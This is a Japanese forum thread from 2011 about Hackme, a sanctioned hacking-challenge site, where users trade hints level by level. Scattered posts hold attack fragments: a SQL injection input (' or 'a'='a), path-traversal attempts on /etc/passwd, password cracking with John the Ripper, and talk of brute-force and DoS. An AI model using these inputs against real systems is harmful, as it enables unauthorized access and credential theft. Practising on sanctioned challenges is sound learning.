【Hackme】ハッキング力検定サイトHackme

このエントリーをはてなブックマークに追加
1名無しさん@お腹いっぱい。
ハッキングの実力が試せるサイトHackme
http://hackme.netfire.jp/start

力試しにどうぞ
2名無しさん@お腹いっぱい。:2011/02/16(水) 23:26:23
Lv2クリアできねぇ・・・
3名無しさん@お腹いっぱい。:2011/02/17(木) 00:15:01
だめだ
Lv2から変な変数が定義されまくっててぐっちゃぐちゃだ
4名無しさん@お腹いっぱい。:2011/02/17(木) 11:41:45
だれかLv2クリアできた奴いる?
5名無しさん@お腹いっぱい。:2011/02/17(木) 12:14:42
たぶんいない
作者がLv1で詰んでるやつ大杉って嘲笑してる・・・
6名無しさん@お腹いっぱい。:2011/02/17(木) 13:46:55
ツイッターによるとLv5まであるらしいな
ムズすぎだろこれ
7名無しさん@お腹いっぱい。:2011/02/17(木) 18:54:53
おまえら頑張れよ2からすすめねえ
8名無しさん@お腹いっぱい。:2011/02/17(木) 19:06:01
やっぱみんな2か
開発じゃなくてIAサーバ設計構築・運用しか経験ないからスクリプトとかあんまわからん
9名無しさん@お腹いっぱい。:2011/02/17(木) 21:12:06
これって手段は何でもいいのかな?
10名無しさん@お腹いっぱい。:2011/02/17(木) 21:59:17
まずは手段とか犯罪以外なんでもいいから、Lv2クリアした猛者あらわれてほしい
11名無しさん@お腹いっぱい。:2011/02/17(木) 22:37:11
blackbuntuかbacktrack持ち出して徹底的にやってみろ
12名無しさん@お腹いっぱい。:2011/02/18(金) 12:53:48
アングラ攻略サイトのほうがおもしろいな

レベルが上がるごとに難易度も上がればやる気出るけど、これじゃ開発者のオナニーじゃん
13名無しさん@お腹いっぱい。:2011/02/18(金) 13:10:46
なんか急に人増えたな
サイト落ちたりしないのか?
14名無しさん@お腹いっぱい。:2011/02/18(金) 13:21:59
>>12
まぁ力抜けよ
こんな下らないサイトにムキになってもしょうがないぞ
15名無しさん@お腹いっぱい。:2011/02/18(金) 13:28:53
>>14
謎解きゲーや脱出ゲーの類だと思ってやってガッカリしただけw
作り手が楽しませるつもりがないなら仕方ないわ
16名無しさん@お腹いっぱい。:2011/02/18(金) 13:29:57
オナニーだな完全に
でもLv5いきたいお
17名無しさん@お腹いっぱい。:2011/02/18(金) 14:26:34
firefoxで最初のページから進まなくて
それ自体がテストだとしばらく・・・というかかなり悩んだ件。
Lv1のページに行くこともできなかったヨ。

ってかマジでLv1と2の差が大きいなw
18名無しさん@お腹いっぱい。:2011/02/18(金) 17:57:48
>>12,14
Lv2のヒント教えてくれ
19名無しさん@お腹いっぱい。:2011/02/18(金) 19:58:24
セキュ板住民は誰も突破できないか・・・
UNIXにスレたてた方がよかったんじゃないか
20名無しさん@お腹いっぱい。:2011/02/18(金) 20:13:57
いや、セキュ板で合ってると思う
でなければプログラ民か
21名無しさん@お腹いっぱい。:2011/02/18(金) 20:18:46
(Lv3) rastynail 称号:ハッカー
(Lv3) xKalimantan 称号:ハッカー

こいつらかっけー
22名無しさん@お腹いっぱい。:2011/02/18(金) 20:20:23
亀頭満タンww
23名無しさん@お腹いっぱい。:2011/02/19(土) 01:26:35
(Lv3) rastynail 称号:ハッカー
(Lv3) xKalimantan 称号:ハッカー
(Lv3) ritton 称号:ハッカー
(Lv3) ymzkei5 称号:ハッカー
24名無しさん@お腹いっぱい。:2011/02/19(土) 17:27:55
Lv2で挫折した…orz
25名無しさん@お腹いっぱい。:2011/02/19(土) 17:57:36
難しいよなぁLv2
26名無しさん@お腹いっぱい。:2011/02/19(土) 19:59:07.48
>>3
バカか?スクリプトって。。。jqueryとかgoogle anal とかしか使ってないだろうが。。。
27名無しさん@お腹いっぱい。:2011/02/19(土) 19:59:54.72
Lv2って突破に必要な情報無くね?
必要な情報は全部cgi内か
28名無しさん@お腹いっぱい。:2011/02/19(土) 22:02:21.23
>>3
アドレスのとおりあのjsって
グーグルの作ったライブラリじゃないの?

lv2ってxssを利用するのかな
29名無しさん@お腹いっぱい。:2011/02/19(土) 22:30:56.10
返ってくるエラーからヒント見つけろ
30名無しさん@お腹いっぱい。:2011/02/20(日) 00:28:11.50
そんなのハッキングじゃなくて昭和のアドベンチャーゲームだろ…
31名無しさん@お腹いっぱい。:2011/02/20(日) 02:33:07.82
>>30
ゆとり乙
32 冒険の書【Lv=5,xxxPT】 :2011/02/20(日) 02:45:19.09
レベル2はソースんなかには答えは絶対ねえよな(´・ω・`)

んじゃあどこにあるんだ( ゚Д゚)ヴォケ!!
33名無しさん@お腹いっぱい。:2011/02/20(日) 02:49:12.41
ですね
34名無しさん@お腹いっぱい。:2011/02/20(日) 03:45:55.64
レベル2は、ユーザIDに適当な値入れて
パスワードに、「' or 'a'='a」とか入れるとPHPのエラーが出るから
SQLインジェクションあたりじゃないの?

もう力尽きて寝る
35名無しさん@お腹いっぱい。:2011/02/20(日) 05:29:07.95
たかが腕試しとバカにしてた
全然わからないorz
36名無しさん@お腹いっぱい。:2011/02/20(日) 09:05:21.82
Lv2はソース見るんじゃなくてSQLインジェクションであるのは間違いないはずなんだが・・・
エラーの内容も不思議で、そっからどう考察していいのか分からん。
37名無しさん@お腹いっぱい。:2011/02/20(日) 13:42:04.86
ああいうエラーが出るんだったら、別にあの文字入れなくてもエラーが出るはずなんだよな。本当は。
38名無しさん@お腹いっぱい。:2011/02/20(日) 14:48:55.96
すげー。
SQLインジェクションだとか気づかなかった。
じゃぁLv3がXSSか。
39名無しさん@お腹いっぱい。:2011/02/20(日) 18:21:53.41
俺はXSS専門だから諦めた
頑張れよ
40名無しさん@お腹いっぱい。:2011/02/20(日) 19:38:45.56
このスレ、レベルが低すぎる…
41名無しさん@お腹いっぱい。:2011/02/20(日) 19:54:47.15
wwwwwwwwwwwwwwwwwwwwww
42名無しさん@お腹いっぱい。:2011/02/20(日) 21:20:31.83
なんか、エラーメッセージが変わっている……。
中の人、何を考えているのやら。
43名無しさん@お腹いっぱい。:2011/02/20(日) 22:34:10.86
前のメッセージでも十分だったのに更にわかりやすくなったなw
44名無しさん@お腹いっぱい。:2011/02/20(日) 23:55:37.80
SQLインジェクションなんだと思うけど、モノホンの脆弱性が作ってあるんじゃなくて(当たり前か)
SQLインジェクションっぽい動作をするニセモノだから、モノホンの脆弱性を突くツールとかが
通用しなくて、結局のところ、連想クイズになっちゃってる。
45名無しさん@お腹いっぱい。:2011/02/21(月) 00:09:20.51
いつの間にかLv3突破した奴いるぞwwww
46名無しさん@お腹いっぱい。:2011/02/21(月) 01:00:09.67
複数のアカウントを一人が作成可能っぽいから
一人が何個もとってたりして…
47名無しさん@お腹いっぱい。:2011/02/21(月) 08:23:21.64
>>46
それ何の意味があるんだ?
48名無しさん@お腹いっぱい。:2011/02/21(月) 08:26:33.79
複数のアカウントでネット上の活動をしてる人間には大あり
49名無しさん@お腹いっぱい。:2011/02/21(月) 11:48:41.62
>>44
脆弱性探しなんて連想ゲームのようなもんだよ。
ツール使って調べる方がパターン限られてるからな。
50名無しさん@お腹いっぱい。:2011/02/21(月) 12:33:44.95
Lv2 ひどいな。
作者の記述スタイルに添って書かねばならんとは。
これじゃ、パスワード推測とほとんど変わらん。
51sage:2011/02/21(月) 12:40:26.84 BE:2778590467-2BP(101)
クエリエラーが出たから、今度はさらにクエリエラーをでない形に持って行って
そこからWhere句をTrueに持っていく構文を書けばいいのだろうと思うのだが
まず、エスケープシーケンスにしてもクエリエラーが絶対出る
推理できん
52名無しさん@お腹いっぱい。:2011/02/21(月) 12:47:23.23
>>51 たぶん、本質的には正解。
後は、スペースのありなしとか大文字小文字とかTrue にするための式とかのバリエーションを
順列組み合わせで試していくしかない。
こんなのに、休日関わっていた俺ってバカ。
53名無しさん@お腹いっぱい。:2011/02/21(月) 12:47:55.58
whereをtrueというより作者の記述の仕方でtrueにしなきゃいけないみたいだからきついんじゃないか
54名無しさん@お腹いっぱい。:2011/02/21(月) 12:49:23.89
正解判定を正規表現マッチで行うくらい、普通のエンジニアならやるのにな。
とにかく、かなりむかつきました。
55名無しさん@お腹いっぱい。:2011/02/21(月) 12:50:48.06
むかつかせるのが目的
56名無しさん@お腹いっぱい。:2011/02/21(月) 12:59:52.70
>>54
普通のエンジニアなら疑似SQLの実装くらいするのにな。
かなりムカつきました
57名無しさん@お腹いっぱい。:2011/02/21(月) 13:05:39.22
sqlインジェクションというなの文字列比較w
58名無しさん@お腹いっぱい。:2011/02/21(月) 13:09:10.48
ヒント: α版
59名無しさん@お腹いっぱい。:2011/02/21(月) 13:41:54.70
β版を待て、ってことか?

あと、あのサイトは何が目的なんだ?
60名無しさん@お腹いっぱい。:2011/02/21(月) 13:56:02.31
作者の思考は万人共通かを測ること
61名無しさん@お腹いっぱい。:2011/02/21(月) 13:58:04.21
会社の売名だろ?
62名無しさん@お腹いっぱい。:2011/02/21(月) 14:17:50.21
(Lv4) yoshimura_yuu  称号:ハッカー

このスレにいないのか?
63名無しさん@お腹いっぱい。:2011/02/21(月) 14:27:18.45
twitter にいるみたい。
64名無しさん@お腹いっぱい。:2011/02/21(月) 14:55:13.65
>>50
気持ちはわかるが、常套句じゃないか?あれ
65名無しさん@お腹いっぱい。:2011/02/21(月) 18:26:35.57
作者の答えとぴったり一致しないといけないのか・・・
やられた
66名無しさん@お腹いっぱい。:2011/02/21(月) 18:39:57.16
ダミーのDBMSと接続して、実際にSQL走らせるくらいして欲しい
SQLiteあたりの組込みDBMS使えば、ユーザ毎に違うDB使えるでしょ
67名無しさん@お腹いっぱい。:2011/02/21(月) 18:46:45.94
>>66
でも負荷大きそうだな
68名無しさん@お腹いっぱい。:2011/02/21(月) 21:06:04.72
難しいよ
lv2
69名無しさん@お腹いっぱい。:2011/02/21(月) 22:06:56.86
ふっ、このスレにはまだLv2を越えたやつはいないようだな。








俺を含めて
70名無しさん@お腹いっぱい。:2011/02/21(月) 22:10:19.95
Lv2はクリアしたけどLv3難しいな
触ってみた感じXSSだと思うけど…
71名無しさん@お腹いっぱい。:2011/02/21(月) 22:13:39.62
ゴールデンクロスサイトスクリプティング!!!!!
72名無しさん@お腹いっぱい。:2011/02/22(火) 00:50:25.51
みんながブー垂れたからか、Lv2、一字一句同じじゃないとダメっていうのじゃなくなったみたい。
73名無しさん@お腹いっぱい。:2011/02/22(火) 01:01:14.96
ハックミーはおわコン
74名無しさん@お腹いっぱい。:2011/02/22(火) 01:55:46.87
>>70
Lv2がんばってやって見る価値ある?
やってみて腹立つ感じだったらやりたくない、、
75名無しさん@お腹いっぱい。:2011/02/22(火) 02:08:40.49
XSSじゃサーバー側の認証は突破できないんじゃね?
page=を何とかするんだと思うんだが、もうやる気はない。
76名無しさん@お腹いっぱい。:2011/02/22(火) 02:19:23.98
>>74
自己レス
インジェクションの勉強になった
よし、次はlv.3
77名無しさん@お腹いっぱい。:2011/02/22(火) 02:40:06.77
見栄張ってlv2クリアした発言するのはどこも一緒だな
78名無しさん@お腹いっぱい。:2011/02/22(火) 04:13:35.55
最後の2文字足りなかっただけで2日なやんでたとか・・・
あってもなくてもどっちも常套句だろー
79名無しさん@お腹いっぱい。:2011/02/22(火) 05:51:17.01
ちなみにLv3をクリアした俺はプログラムなんて一切組めない
HTMLが多少わかる程度だよ
80名無しさん@お腹いっぱい。:2011/02/22(火) 06:36:46.11
これが現代の邪気眼発動者か
81名無しさん@お腹いっぱい。:2011/02/22(火) 07:42:14.97
Lv3は最初XSSかと思ったけどXSSができたところでなんだという話だよな…

ただ、XSSみたいなことをすると他と違うエラーが返ってくるね
閉じるタグがはねられる
82名無しさん@お腹いっぱい。:2011/02/22(火) 07:56:16.44
>>81
閉じるタグがはねられる?
83名無しさん@お腹いっぱい。:2011/02/22(火) 08:31:30.74
>>80
せやで!
>>81
Lv.3は通常だとありえない状態になってるから分かりにくいけどURLを見れば手法はピンと来ると思うんだが
84名無し募集中。。。:2011/02/22(火) 09:03:06.53
昨日さくっとやってみた
とりあえずLv.4まではそんなに困ることなくいけたけど
Lv.5は難しくてパっとはできなかった
85名無しさん@お腹いっぱい。:2011/02/22(火) 09:46:11.44
ってことはLv5をクリアしちゃったってことか・・・凄いな
86名無しさん@お腹いっぱい。:2011/02/22(火) 09:59:54.38
ランキングで5クリアしてる奴いない・・・
87名無しさん@お腹いっぱい。:2011/02/22(火) 10:34:32.30
釣りじゃねーの
88名無しさん@お腹いっぱい。:2011/02/22(火) 11:10:19.92
lv2クリアした。
なんだかんだ言ってるけど一般的じゃないかw

レベル3に行くぜよ。
89名無しさん@お腹いっぱい。:2011/02/22(火) 11:21:27.24
>>82
とにかく、<〜></〜>って形式の物を送ると、
The input field '</〜>' was not expected.
って出る。

>>83
URL、確かに特徴的だけど、それをどうすればいいんだかわからんw
90名無し募集中。。。:2011/02/22(火) 11:27:01.61
>>85
いやいやLv.5はまだできてないっスー
パっとできなかったから現在放置中
またやってみるー
91名無しさん@お腹いっぱい。:2011/02/22(火) 11:28:14.24
>>89
Lv3の話?
そんなの出ないけど
92名無しさん@お腹いっぱい。:2011/02/22(火) 12:46:53.94
>>91

Lv.3で出るよー
でも普通に入れただけじゃ出てこない
93名無し募集中。。。:2011/02/22(火) 13:09:26.32
>>92
それ多分XSSの形式とは関係ないかな
Lv.1とかから同じようにでてくると思う

俺もLv.5でひょっとして、と思って試そうとしたけど
5で独自に作りこまれたものじゃなさそうだったからやめたー
94名無しさん@お腹いっぱい。:2011/02/22(火) 13:17:18.70
>>93
じゃぁ、[文字を与えてください]ってエラーが出せるけど
関係ある?
95名無しさん@お腹いっぱい。:2011/02/22(火) 13:29:14.22
>>93
ソースにヒントがあるってこと?
96名無し募集中。。。:2011/02/22(火) 13:38:13.58
>>94,95
エラーはいろいろ教えてくれてると思うけど、俺はそれ見る前に終わった様子
ソースにヒントはさすがに最初の方だけかと

ネタバレは禁止みたいなんでこのくらいで勘弁してください(;つД`)

これからちょっと触って落ちます
97名無しさん@お腹いっぱい。:2011/02/22(火) 15:58:01.49
Lv3が相当つまらないらしいな
98名無しさん@お腹いっぱい。:2011/02/22(火) 16:03:46.84
99名無しさん@お腹いっぱい。:2011/02/22(火) 16:07:58.48
>>97
別につまらなくはないけど今の時代じゃありえない状態になってる
100名無しさん@お腹いっぱい。:2011/02/22(火) 16:08:03.41
会社のIDSに記録がw
ツールも落とせないwww
おれログ汚しまくりwwwwwwwww
101名無しさん@お腹いっぱい。:2011/02/22(火) 16:20:40.73
泣けるな
お前の会社にも、実はインターネット直通のステルスAPとかあるんだろ?
102名無しさん@お腹いっぱい。:2011/02/22(火) 18:21:28.96
lv3の解きかた方が分かったけど進まないw
ありえないとはこういうことかな・・・
103名無しさん@お腹いっぱい。:2011/02/22(火) 20:12:40.15
だめだ・・・。Lv3わかりません。

上の方で、XSSなどと出てましたが、結局いろいろと試してもうまくいきません。
104名無しさん@お腹いっぱい。:2011/02/22(火) 20:19:04.26
>>103
まだ試してない方法があるんだろ
Lv.4はマジでわからない 直近5件のログイン状況が見れることにヒントがあるんだろうが
105名無しさん@お腹いっぱい。:2011/02/22(火) 20:42:25.02
おい、ランキングのLv3に変なのがいるぞ
106名無しさん@お腹いっぱい。:2011/02/22(火) 20:42:47.98
お前らそればっかやってないで
http://www.hackthissite.org/user/create
これやらね?ジャンル毎にいろんな問題あって面白いぞ
俺は今IRCミッションに取りかかってるがイマイチよくわからん
107名無しさん@お腹いっぱい。:2011/02/22(火) 21:38:58.98
Lv2の答えくれLv3からならわかるきがする
108名無しさん@お腹いっぱい。:2011/02/22(火) 23:07:14.97
じゃあおれはlv3とlv4答えてくれlv5なら余裕でわかるきがするw
109名無しさん@お腹いっぱい。:2011/02/22(火) 23:42:06.30
Lv3わかんねぇ…。URLが何か変って事しか理解できない…orz
110名無しさん@お腹いっぱい。:2011/02/22(火) 23:44:12.73
lv3でけた、ものすごく単純で正攻法でしたw
111名無しさん@お腹いっぱい。:2011/02/22(火) 23:55:19.49
あーあtwitterでほとんどlv3の答え書いちゃったやついるよ
112名無しさん@お腹いっぱい。:2011/02/23(水) 00:10:16.72
>>110
ものすごく単純で正攻法ならもっとクリアする奴は多いと思う
本来あれを見れるって権限的におかしいから発想だけの問題だろうな

>>111自分で答えを出すまでの行程が楽しいのであっていきなり答えにいっても楽しくないのに!
113名無しさん@お腹いっぱい。:2011/02/23(水) 00:15:39.00
片方は権限的にも問題なくないか
114名無しさん@お腹いっぱい。:2011/02/23(水) 00:35:51.73
>>113
片方だけじゃ答えでないでしょ
まさかと思って見てない人もいるんじゃないかと思う
115名無しさん@お腹いっぱい。:2011/02/23(水) 00:42:18.84
たしかに片方だけじゃでないけどさ、まあhackmeってことを考慮して一応みとくみたいな
116名無しさん@お腹いっぱい。:2011/02/23(水) 01:19:02.11
ここburpsuite使えないよな?
117名無しさん@お腹いっぱい。:2011/02/23(水) 02:04:50.15
lv4わかんねー、ブルートフォースはどのlvでもないみたいだし
118名無しさん@お腹いっぱい。:2011/02/23(水) 02:15:51.49
>>107
Lv2はほとんどこのスレに答え書いてあるじゃん

Lv3はわかんね
『**さんの称号は「ちょっと詳しい人」です。
周りから一目置かれている存在でしょう。物知りですね。』
ってのがなんかむかつくw
119名無しさん@お腹いっぱい。:2011/02/23(水) 04:14:35.38
何かの役に立てばと思い
ttp://thinkit.co.jp/free/tech/7/5/1.html
120 ◆nBKtuESn6cjs :2011/02/23(水) 06:46:23.39
>>119
そのまんまだなww
121名無しさん@お腹いっぱい。:2011/02/23(水) 08:34:03.47
>>119
ネタバレ禁止だろ
空気読めよw
122名無しさん@お腹いっぱい。:2011/02/23(水) 09:17:16.90
lv3で既にネタバレしている範囲で書くけど・・・


両方見たところでどうなるんだ?
直接クリアには繋がらない。
それとも分かればなんなくクリアできる方法なのかい?
123名無しさん@お腹いっぱい。:2011/02/23(水) 10:29:36.17
難なくクリアできたよ
124名無しさん@お腹いっぱい。:2011/02/23(水) 10:31:20.72
難なく・・・
ツハモノだよなぁ
125名無しさん@お腹いっぱい。:2011/02/23(水) 10:32:58.60
>>123,124
難なくってどういう意味?
126名無しさん@お腹いっぱい。:2011/02/23(水) 10:57:02.39
難なく・・・か。
きっと俺たちは違う方向へ無駄にがんばっているんだな。
目の前の相棒が脳みそフル回転でがんばってくれているw
もう止めてあげよう、こんなに無駄なわけはない。
127名無しさん@お腹いっぱい。:2011/02/23(水) 11:21:07.88
Lv3クリアできたよ!!!!


一応管理者ですよ、はい。
自宅サーバーのねwww

本当にクリアできた人にはわかるだろうw
128名無しさん@お腹いっぱい。:2011/02/23(水) 11:38:09.02
うん
3はクリアできたけどさ
Lv4はUA部分なのかCookieなのか
何を使うのかわからん
129名無しさん@お腹いっぱい。:2011/02/23(水) 11:47:01.04
lv3クリアのために俺の4COREが珍しく30%稼動してるゼ!
130名無しさん@お腹いっぱい。:2011/02/23(水) 12:07:11.46
連続スマン、lv3クリアしたが、一言言わせてもらう。
XSS釣りだろ、むしろlv4こそXSSやもだ。
131名無しさん@お腹いっぱい。:2011/02/23(水) 12:51:12.63
lv3ヒントください。
urlいくらいじっても見つからないし、他のやり方?
132名無しさん@お腹いっぱい。:2011/02/23(水) 13:10:56.33
今日始めた俺からヒント
XSSは釣り、ディレクトリ遡れ
ここのスレのせいで6時間無駄にしたお。
133名無しさん@お腹いっぱい。:2011/02/23(水) 14:03:16.39
lv3はこの前2chがハックされたような感じだな。
134名無しさん@お腹いっぱい。:2011/02/23(水) 14:17:39.37
hackmeって合法的にハックしていいんだよね?
135名無しさん@お腹いっぱい。:2011/02/23(水) 14:25:47.39
>>134
利用規約嫁
136名無しさん@お腹いっぱい。:2011/02/23(水) 14:30:24.02
>>130
釣りってかクリアした奴はXSSなんて言ってないと思う
俺はURLを見ればわかると書いたけど
137名無しさん@お腹いっぱい。:2011/02/23(水) 15:21:00.06
ディレクトリ遡るって、root見るって事?
パスワードmd5暗号化されてない?
てか、俺のそもそものプロセスが間違えてる?

ボクニハムリデシタ
138名無しさん@お腹いっぱい。:2011/02/23(水) 15:52:36.73
>>136
疑問を投げかけられても目の前で起きている事が事実だ。
多分君にはこの先は本当に無理だよ。




lv3はすぐ方法が分かったけど
lv4はヒントが少ないなぁ。
方法が絞れなくて思いつくこと試してたら日が暮れるw

自分のところにだけ引っ付いてるゴミが味噌なのだろうか・・・
139:2011/02/23(水) 15:53:20.66
>>136

>>137
140名無しさん@お腹いっぱい。:2011/02/23(水) 16:23:44.14
たぶんLv.3わかったわ
それらしいファイル吐かれたし

問題はこれをどのように使うかだ…
141名無しさん@お腹いっぱい。:2011/02/23(水) 16:36:45.78
>>140
わかってなくね?
142名無しさん@お腹いっぱい。:2011/02/23(水) 16:56:13.58
>>141
mjky...
ネタバレはやめた方がいいし…

とりあえず英語にするとDから始まる攻撃方法でやってるんだけど…
143名無しさん@お腹いっぱい。:2011/02/23(水) 16:59:22.00
DOS attack ですねわかります
144名無しさん@お腹いっぱい。:2011/02/23(水) 17:04:24.02
lv1〜3まで非実用的なものだったから1v4も多分そうなんだ

lv4は総当りやりたくなる誘惑があるw
145名無しさん@お腹いっぱい。:2011/02/23(水) 17:29:28.36
>>144
だれかそれでbanされたぞw
146名無しさん@お腹いっぱい。:2011/02/23(水) 17:41:16.38
トップページ変わった
1万人突破らしい
147名無しさん@お腹いっぱい。:2011/02/23(水) 17:50:29.12
もっと派手に変えりゃいいものをw
148名無しさん@お腹いっぱい。:2011/02/23(水) 17:59:30.27
>>147
確かにw
まぁトラヒックの問題とかもあるだろうけど。
お前らがDoSとかやるから
149名無しさん@お腹いっぱい。:2011/02/23(水) 18:01:20.03
lv4は4人、lv3は76人とは
lv3の篭城は崩れたようだがlv4はまるで新世界だなw
150名無しさん@お腹いっぱい。:2011/02/23(水) 18:10:48.10
lv3がこんなに増えたのはtwitterで何も考えないアホな奴が
ほとんどネタバレに近いことを書いてるからだと思うよ。
151名無しさん@お腹いっぱい。:2011/02/23(水) 18:37:13.86
lv4の問題載せるのはアリですか?
152名無しさん@お腹いっぱい。:2011/02/23(水) 18:42:57.76
lv3の解答を載せてからならアリ
153名無しさん@お腹いっぱい。:2011/02/23(水) 19:43:13.77
lV3わかんないお。。。
154名無しさん@お腹いっぱい。:2011/02/23(水) 20:43:49.77
第五のlv4にネットファイアの中の人がw
完全に出遅れたお
155名無しさん@お腹いっぱい。:2011/02/23(水) 22:08:33.62
>>149
Lv4は新世界の四皇か
156名無しさん@お腹いっぱい。:2011/02/23(水) 22:27:19.15
ダメだ、lv3解けて当然になってるのに
lv4全くわかんねえ。
そうだ、ヒントだ、ヒント。ヒントを、ヒントをくれ!
お願いだ!!頼・・・む...

とかいってみるテスト
157名無しさん@お腹いっぱい。:2011/02/23(水) 23:19:01.08
あー俺もたぶん>>137と同じ状況で行き詰った。
暗号化解析すんのこれ?
158名無しさん@お腹いっぱい。:2011/02/23(水) 23:22:53.12
lv4簡易化修正入りました
159名無しさん@お腹いっぱい。:2011/02/23(水) 23:44:44.42
ところでlv1の答えを教えてくんないかな?
160名無しさん@お腹いっぱい。:2011/02/24(木) 00:12:35.51
1万人たっせいからの75倍のアクセス、だれだよやったのw
161名無しさん@お腹いっぱい。:2011/02/24(木) 00:12:40.63
24時間かけても無理だった。
俺は所詮、スクリプトキディに過ぎなかったか。
おまいらも、もう認めたらどうなんだ。

週末まで元の生活に戻るとしよう・・・・・・。
162名無しさん@お腹いっぱい。:2011/02/24(木) 00:18:30.77
ハム速ってブログが載せてたけどそのせいで503とかうぜぇわ・・・
163名無しさん@お腹いっぱい。:2011/02/24(木) 01:29:23.55
LV4のヒントって前からあったのかな 露骨すぎワロタ
164名無しさん@お腹いっぱい。:2011/02/24(木) 01:58:38.28
>>119
普段マタークSQLを触らない組み込み屋の俺には助かった。
165名無しさん@お腹いっぱい。:2011/02/24(木) 02:30:45.40
page= に何を入れたらいいかさっぱり分からん。 /etc/passwdとかダメだし。。。
166名無しさん@お腹いっぱい。:2011/02/24(木) 02:38:48.71
Lv3で2つのファイル見れたけど意味がわからない
ヒントない?
167名無しさん@お腹いっぱい。:2011/02/24(木) 02:55:46.67
ありえないパスで見れたけど、パスクラ持ってないよ
168名無しさん@お腹いっぱい。:2011/02/24(木) 02:56:52.52
>>129
何かオススメある?John the GUIとかがよいの?
169名無しさん@お腹いっぱい。:2011/02/24(木) 02:59:54.33
北海道大学のパスワードクラック手順
http://www.ep.sci.hokudai.ac.jp/~epcore/manage/pwcrack.txt

なんでこんなものが公開されとるんだか。
170名無しさん@お腹いっぱい。:2011/02/24(木) 03:17:10.28
ただのツールの使い方じゃねえかw
171名無しさん@お腹いっぱい。:2011/02/24(木) 03:19:11.51
どのツールがよいのか教えててよ
172名無しさん@お腹いっぱい。:2011/02/24(木) 03:25:44.29
ggrks
173名無しさん@お腹いっぱい。:2011/02/24(木) 04:36:22.67
今やってきてLv2までクリアしたけど、にわかじゃあLv3わからねぇー
そもそもなんの認証使ってるかもわからんのじゃ無理w
174名無しさん@お腹いっぱい。:2011/02/24(木) 04:45:17.49
おはよう、lv4進展なしか
>>168
俺はそれ使った
>>173
俺は門外漢でここに立っていたぞw
175名無しさん@お腹いっぱい。:2011/02/24(木) 04:56:24.76
結局ゴリ押しなのか。。。
176名無しさん@お腹いっぱい。:2011/02/24(木) 04:59:23.44
4はどうみてもXSS系なんだけどなぁ
177名無しさん@お腹いっぱい。:2011/02/24(木) 05:04:51.91
二つのファイルは手に入った
John the guiでunshadowしたいんだけど、mhtファイルのままでいいの?
178名無しさん@お腹いっぱい。:2011/02/24(木) 05:19:17.25
人に聞くのもいいけど自分で調べてこそハッカーや
ソーシャルは別な
179名無しさん@お腹いっぱい。:2011/02/24(木) 05:19:33.68
誰だよDDoSしたやつw
180名無しさん@お腹いっぱい。:2011/02/24(木) 05:38:24.52
Lv4 総当りスクリプト書いてくる。
パタン少ないし、一秒に一回なら大丈夫だろ。
181名無しさん@お腹いっぱい。:2011/02/24(木) 05:43:04.25
>>180
BAN強化中だお、そうでなくともそのパターンではじかれた人いるし・・・
182名無しさん@お腹いっぱい。:2011/02/24(木) 05:53:20.94
Lv4って普通だったら釣れるの待たなくちゃいけなくない?

方向性が違うのかな・・・。
183名無しさん@お腹いっぱい。:2011/02/24(木) 07:18:22.43
お前らXSSって余所のサイトと連携しないと意味ないこと分かってんのww
184名無しさん@お腹いっぱい。:2011/02/24(木) 07:20:09.47
あんだけtwitterのネタバレにはうるさかったのにもうここでもネタバレが始まってるなw

ここ見りゃちょっとPCに詳しい人ならLv.3まではクリアできるだろw
185名無しさん@お腹いっぱい。:2011/02/24(木) 07:25:42.18
Lv.3をクリアするために切り裂きジョンをコンパイルした
186名無しさん@お腹いっぱい。:2011/02/24(木) 07:36:07.99
>>169
自分のサーバに対してアタックかけるのは管理者として普通の行為だからだよ。
187名無しさん@お腹いっぱい。:2011/02/24(木) 07:56:42.25
Lv5まであるという話だけど、もうLv6も用意されてるよな?
あとTwitterでLv4相当の問題を募集してるけどこれはLv4が差し替えになったり分岐したりするんだろうか。
188名無しさん@お腹いっぱい。:2011/02/24(木) 07:58:40.16
guesses: 1 time: 0:00:13:40
189名無しさん@お腹いっぱい。:2011/02/24(木) 08:41:48.66
4万5000人か。
大ハッキング時代の幕開けだなw
190名無しさん@お腹いっぱい。:2011/02/24(木) 09:11:11.00
ネタバレひどすぎるだろ。
lv3まではググればほぼ出来るという・・・。

まぁそれもクラッキングの手順ではあるのかしらん。
191名無しさん@お腹いっぱい。:2011/02/24(木) 09:21:48.56
常識的だとすれば問題ないかと。Lv4はさっぱりだがL
192名無しさん@お腹いっぱい。:2011/02/24(木) 09:39:43.21
Lv4の解きかたがわかった!!!!!!!!!
あとは作者が意図する条件を探すのみだ。
193名無しさん@お腹いっぱい。:2011/02/24(木) 10:05:03.27
LV3
パスワードはわかったけどユーザー名が分からん…
194名無しさん@お腹いっぱい。:2011/02/24(木) 10:38:18.84
セットのはずだが
やり方間違ってるんじゃね
195名無しさん@お腹いっぱい。:2011/02/24(木) 11:12:43.11
>>193
セットだな。パスワードが分かった段階で軽く分かるはず
196名無しさん@お腹いっぱい。:2011/02/24(木) 11:31:01.75
>>194-195

どうやら間違っていたようだ。

疲れた寝る。
197名無しさん@お腹いっぱい。:2011/02/24(木) 11:37:04.64
おまいらバレすぎや
http://twitter.com/Netfire_Inc/status/40574821507010560

中の人がご立腹だぞ
198名無しさん@お腹いっぱい。:2011/02/24(木) 11:45:02.99
unshadowできなくね?
199名無しさん@お腹いっぱい。:2011/02/24(木) 11:51:15.38
>>198
相当回数トライしてできました。ちなみに切り裂き
200名無しさん@お腹いっぱい。:2011/02/24(木) 12:13:56.04
>>197
問題の変更?むしろ有難いではないか。
lv1〜3は>>119>>169のように、思いつけば
はなからググればできるのだから・・・・・・

・・・lv4はもうちょっと待ってっっ
201名無しさん@お腹いっぱい。:2011/02/24(木) 12:22:45.52
>>199
ああ、切り裂きヨハンだよね?上にもあったように、ヨハンGUIでunshadow仕様と思うんだけど、出てくるのが0バイトの空っぽのファイルのみ
もしよければ使える拡張子だけでも教えて欲しい。それともURLをまるごとブチ込むの?
202名無しさん@お腹いっぱい。:2011/02/24(木) 12:26:54.66
>>201
ググろう。ネタバレになるから
203名無しさん@お腹いっぱい。:2011/02/24(木) 12:27:40.00
ggr
204名無しさん@お腹いっぱい。:2011/02/24(木) 13:19:29.54
やっとレベル2クリア><
205名無しさん@お腹いっぱい。:2011/02/24(木) 13:21:51.46
これってブラウザ以外にツール必要なの?
ツール前提で不正アクセス禁止って糞だと思うんだが
206名無しさん@お腹いっぱい。:2011/02/24(木) 13:25:49.91
ググって出てくるのがここじゃないのww
207名無しさん@お腹いっぱい。:2011/02/24(木) 13:33:44.92
別にツールなくてもできるよ、手計算すればw
208名無しさん@お腹いっぱい。:2011/02/24(木) 13:37:30.17
レベル3は楽勝過ぎw
